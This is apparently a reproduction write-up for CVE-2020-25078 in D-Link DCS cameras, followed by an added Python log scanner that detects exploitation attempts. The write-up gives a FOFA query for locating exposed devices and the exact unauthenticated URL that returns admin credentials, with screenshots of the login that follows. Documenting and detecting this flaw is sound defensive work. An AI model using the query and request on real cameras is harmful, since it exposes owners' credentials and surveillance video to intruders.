# D-Link DCS Series Cameras Account and Password Information Disclosure Vulnerability CVE-2020-25078

### Vulnerability Description <a href="#lou-dong-miao-shu" id="lou-dong-miao-shu"></a>

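On D-Link DCS series cameras, accessing a specific URL returns the account name and password. An attacker who uses this vulnerability to log in to the admin interface can access the video surveillance page.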

### Affected Products <a href="#lou-dong-ying-xiang" id="lou-dong-ying-xiang"></a>

DCS-2530L, DCS-2670L, DCS-4603, DCS-4622, DCS-4701E, DCS-4703E, DCS-4705E, DCS-4802E, DCS-P703

### FOFA <a href="#fofa" id="fofa"></a>

```
app="D_Link-DCS-2530L"
```

### Vulnerability Reproduction <a href="#lou-dong-fu-xian" id="lou-dong-fu-xian"></a>

The login page looks like this:

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-Mhr0DFdH66XtvxzCIRl%2F-Mhr1YSbLSZT9XBYJVUI%2Fimage.png?alt=media\&token=08fd4da5-d1e8-43e3-8d93-7f6ee37b9e41)

The vulnerable URL is shown below; its response discloses the account name and password:

```
http://xxx.xxx.xxx.xxx/config/getuser?index=0
```

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-Mhr0DFdH66XtvxzCIRl%2F-Mhr1b0WQLoQzgXHLEEX%2Fimage.png?alt=media\&token=810f4ad4-91d1-4921-99e8-94d7c6571dce)

Log in to the system using the disclosed account name and password:

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-Mhr0DFdH66XtvxzCIRl%2F-Mhr1e9fQUWVtAF6hBid%2Fimage.png?alt=media\&token=901ddabe-4520-44bf-ba8f-e43ec996c6f7)
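
A defender-side check for the request described above, as an added example that is not part of the original page: it scans HTTP access logs for requests to `/config/getuser` and marks those answered with a 2xx status to an unauthenticated client. The combined log format, the reverse proxy or HTTP sensor that would produce it, and all sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, unquote, parse_qs

# Constructed sample lines in combined log format (assumed source: a reverse
# proxy or HTTP sensor in front of the cameras; none of this is from the page).
SAMPLE_LOG = """\
198.51.100.7 - - [12/Mar/2024:10:01:02 +0000] "GET /config/getuser?index=0 HTTP/1.1" 200 48 "-" "curl/8.0"
198.51.100.7 - - [12/Mar/2024:10:01:03 +0000] "GET /config/getuser?index=1 HTTP/1.1" 200 47 "-" "curl/8.0"
203.0.113.9 - - [12/Mar/2024:10:05:40 +0000] "GET /config/%67etuser?index=0 HTTP/1.1" 401 0 "-" "Mozilla/5.0"
192.0.2.15 - admin [12/Mar/2024:10:07:11 +0000] "GET /video/live.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.15 - - [12/Mar/2024:10:08:00 +0000] "GET /config/getuserlist HTTP/1.1" 404 0 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<src>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def find_getuser_hits(log_text):
    """Return {src_ip: [(timestamp, index, status, exposed)]} for getuser requests."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not combined-format entries
        url = urlsplit(m["target"])
        # Decode percent-encoding and normalise case so trivial variants still match.
        path = unquote(url.path).lower().rstrip("/")
        if path != "/config/getuser":
            continue
        index = parse_qs(url.query).get("index", ["?"])[0]
        status = int(m["status"])
        # A 2xx answer to a request with no authenticated user means the
        # credentials were most likely returned to the client.
        exposed = 200 <= status < 300 and m["user"] == "-"
        hits[m["src"]].append((m["ts"], index, status, exposed))
    return dict(hits)

if __name__ == "__main__":
    for src, events in find_getuser_hits(SAMPLE_LOG).items():
        for ts, index, status, exposed in events:
            verdict = "CREDENTIALS LIKELY EXPOSED" if exposed else "blocked/failed"
            print(f"{src} {ts} index={index} status={status} -> {verdict}")
```

Any camera that appears with an exposed hit should have its account passwords treated as compromised and rotated.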
